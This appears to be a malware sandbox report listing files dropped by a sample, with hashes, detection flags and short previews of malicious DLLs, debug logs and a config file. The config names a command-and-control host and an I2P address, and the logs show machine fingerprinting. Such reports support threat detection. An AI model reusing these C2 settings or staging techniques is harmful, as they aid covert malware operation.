SHA-512:	F6C46EFF373EBE1637904E143A0C73AA975B39C8F6498C0EDDB74ABB5303019DE3C7CB64174E1A09FC3B666A71D95E7A1BB2DAE737F73526DB558A92367A4CFF
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.2.2.5.0.6.6.0.8.3.9.5.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.2.2.5.0.6.6.5.0.5.8.1.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.1.4.9.3.f.8.-.8.0.c.0.-.4.c.5.f.-.a.e.8.c.-.b.4.c.0.a.f.e.a.8.1.5.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.2.a.f.e.0.b.-.c.1.1.1.-.4.6.b.3.-.9.3.9.6.-.1.e.0.2.5.2.b.6.a.7.2.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.0.-.0.0.1.4.-.f.8.1.1.-.5.a.0.6.7.0.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.d.b.8.9.6.1.f.8.a.f.b.9.9.9.a.e.c.e.6.0.b.f.1.e.f.3.e.4.9.e.8.e.2.3.4.9.f.7.b.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3048.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jan 1 17:11:06 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	633932
Entropy (8bit):	1.0067414694163621
Encrypted:	false
SSDEEP:	768:op695wUHk8hj6OcYD/Onz2UIgiXmkgGdz/rHJ+d:okXBj6OcUOnz2UJF
MD5:	BA2EE4F42CFCFC0F6DAB58C4368FCD6B
SHA1:	ED1C138AE6D6C8E203348A04932EBD5C79D284BE
SHA-256:	BB45C8AE3922332D5BEDB5C7F1BD49550E0DFEDC4C0A4DF31D994EE967B5E965
SHA-512:	4639CD5A0648775C64E9B8B579AF0116D3F0EC806F37930F36B85081CAD57D5B282C5E13D78B6886E1A584AF6C7A4604D3CB4D9CB5E91E7BAFDE32F93574DED3
Malicious:	false
Preview:	MDMP..a..... .......*wug............$...........(...8...........` ......4...h...........`.......8...........T............/...\|..........\!..........H#..............................................................................eJ.......#......Lw......................T............vug.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3153.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6726
Entropy (8bit):	3.7153809195983682
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb8EjEkYHV4nMC5aM4UB89bfDqmDvjvlfIN1m:R6l7wVeJ8Ej/YHcprB89bfpFfIN1m
MD5:	70FD3B2049EE0D56AFE5999C6210AA9A
SHA1:	D041672AF568D6814A92185680CDD3C914F25803
SHA-256:	EEC3CCE2943E980FFADBE50D041BA04BE1FB80D380A8846740E54BB3F2F51566
SHA-512:	8BA83C56F031577C719875CEA0798CF7C3AE4403133A9E421D1AD3B1A28856C716CE39BE5EFB6CD2CD1C0089DC764D0221296946BDD00BBCB7A790D5CCBC4751
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3173.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4603
Entropy (8bit):	4.410682346531106
Encrypted:	false
SSDEEP:	48:cvIwWl8zsMuJg771I90vWpW8VYkYm8M4JD2+AFBQ6Hyq85/3O4hA3+MDwMdd:uIjfMkI7L+7VMJabHzIA3ZLdd
MD5:	41CFE22AC35329CEEDA0FA4DC30CF11C
SHA1:	BE5D7834BEB753E6FBB3321B71B3E3393BCD9E51
SHA-256:	1AEDD90BC397FA5E5503E4A76BE530CBF9AAE1021C235ED98D6DD2734F8889D1
SHA-512:	E67C9DD258249AF8D2709C2F928F069B569F0F5566D6D5567842FB80815B8409AA7778CC7DD8798231AF184E2623D086E34EC34188199CFDFF1F6550E470EF1B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="657133" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3180.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77842
Entropy (8bit):	3.098414960825057
Encrypted:	false
SSDEEP:	1536:5WOSK/Z6U1YlD9brMYQf7Nm6PV7Rd8oFru:5WOSK/Z6U1YlD9brMYQf7Nm6PVVd8oFS
MD5:	A670A30815474C3F841FD20FD7CBDF74
SHA1:	4A1B60CCBF528E41E3B10A20CCBE73ED4765C72C
SHA-256:	5B013DB8489F3C1D388587F4FED036666B90AF90D21CDDDC3611E4A704D80970
SHA-512:	9D4D2BA2B3052AC2689E69571BCD187176D084BEE5D89F3D5F4BB0207DED123BA0A504567FF7CFD45FA7054ADB4353794E2CA06F14C86B4E825769E6E1B52D62
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31C0.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685584356992996
Encrypted:	false
SSDEEP:	96:TiZYWB3hNDUY0Y/mW8HQUYEZlctKiDIPlDwTx1YaUzmnmMN9xhrI+M3:2ZDB0jlijYaUzmmMN7y+M3
MD5:	1EAC372E1EE2F5FE07FDBAAA17B98604
SHA1:	07F3591FA22CD451468450F6CCADB381F35A1C31
SHA-256:	B0543A6C34D059C82010CC44426D168403D8F6667ED6B1CEDC3C25CDEF96912E
SHA-512:	186591630F2C4858506B4B5E7034B2F0574C259D3BAA9916D3E8B3381F9D2430AB46C2EC92B44A75CB283674DB717543D575F8AC424B57CB62601980333F3E75
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.193969228624904
Encrypted:	false
SSDEEP:	1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
MD5:	EC9499EE84ED09B77BE0A35EC87B781C
SHA1:	4148D40284BAB415DDB828BD4061A4FE93C9AF26
SHA-256:	5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
SHA-512:	D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: ET5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f.................@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3639
Entropy (8bit):	5.660827517402496
Encrypted:	false
SSDEEP:	96:idH9NYJ9VFl3YPQYPTNYP6YPtYP/YPV3HQHfCzyLy+e56LE:AdNiTDXoNZ84U3w/Yj+e5h
MD5:	9DD49B1413C6A084CF2E9C1E4BFA61EA
SHA1:	48EB69EF13BFC059187DD83F67D4BC0536301AF8
SHA-256:	3EC99DEFC8ECEC93749DAB51BA4C0EDF6B660FC923508E71160BD56378FB1219
SHA-512:	BE9B648CF9C8AD328A1C9A6287C1E2AE9187B0DEAAF5FC4874ABD77C0DEE0AFBB577D61BC07F3850DB9F667EA6F7C0815FA3429BBB6BC25606495F4EA4A72F7C
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=9

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.129024990254676
Encrypted:	false
SSDEEP:	6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
MD5:	7D88563AD41BAF4026CFC5D098CBF40D
SHA1:	442756834CCCEB84F219F3C762852437FBB3458E
SHA-256:	D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
SHA-512:	F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.236071662185895
Encrypted:	false
SSDEEP:	1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
MD5:	CE579A1BDCB9763DAFEBF01AD29F918C
SHA1:	F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
SHA-256:	0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
SHA-512:	EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: ET5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1021
Entropy (8bit):	5.4397611312982255
Encrypted:	false
SSDEEP:	24:CFAGHS+5lGyclY7Gfy6BgT7cRE9FLxJbJ/l0ERXX+e:CFdHS+54yclDYcm9FLnFlDb
MD5:	3CEF0743CCD2A6D4B0F6248C38548FF3
SHA1:	FC782D2939444A6F119552C50C969D7E91A1956A
SHA-256:	B9BF139C71D597E5393CF935012790B2353FEE80D1D907354E97A752C77A4829
SHA-512:	F590334E1B285E3705A38A985C49B0CD3B2B232D3E3B70C1AB4466B6C30C585826BF05B187B278B76D273D6B6BD7B4F44A6A6F0949EC90D13281561634BC44A9
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe126d1dbd)..[I] (tcp_connect) -> Done(sock=0x198,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.229119632298774
Encrypted:	false
SSDEEP:	1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
MD5:	7FEA520E80E7A73252F2A5C204BBF820
SHA1:	557D33F75805669A6D5E98D0E6CD3B790ECF3464
SHA-256:	64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
SHA-512:	6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: ET5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6988
Entropy (8bit):	5.390594499810993
Encrypted:	false
SSDEEP:	48:CFdHs54yclDYcm9FLnFlzBp1/J1EucIHEznRLEqqYE1X0EH+IK:idHrNYJ9VFlzBLTEcHELNEaEuEH6
MD5:	CF8CD0716FA3DED306D083F91EF5F89C
SHA1:	B3DBB17ED55B56339AF8612584F459C85CCB630E
SHA-256:	1F374C760BCEB3E864C929D75F7F172FCB51D74B7369B4BCC68F493D157FF5A0
SHA-512:	2A732FFB9A3219DA77511F9B0380D539D329CC949A03A8A9DB63C225265F9E8F1C9E083876FF0465A17FC6CA95890A3E87ED76AC88A80786821611C7ACAF01DF
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	75977
Entropy (8bit):	7.8696816318811385
Encrypted:	false
SSDEEP:	1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
MD5:	E53A179BB45CD7EDD8371740D65076BD
SHA1:	6B74034746E12C2058614A9DF671C31B79EAA7E9
SHA-256:	C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
SHA-512:	767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
Malicious:	false
Preview:	I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..\|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..\|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\gbchwntevtynyptbzxexwwype6ngdzwnhtbbsw3ct7bndroswrka.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.654714265742094
Encrypted:	false
SSDEEP:	12:NCRm4ZC4ZElhu3qesntBEe1FByD0KJpkAw9DXEhLYGru:NCRgQqhPesntBEeXMXCAwpEh7K
MD5:	277CA4807FDE027621069661F070625B
SHA1:	18582CE91DDF0B2AC8B6C634AFAF6FADC550C23F
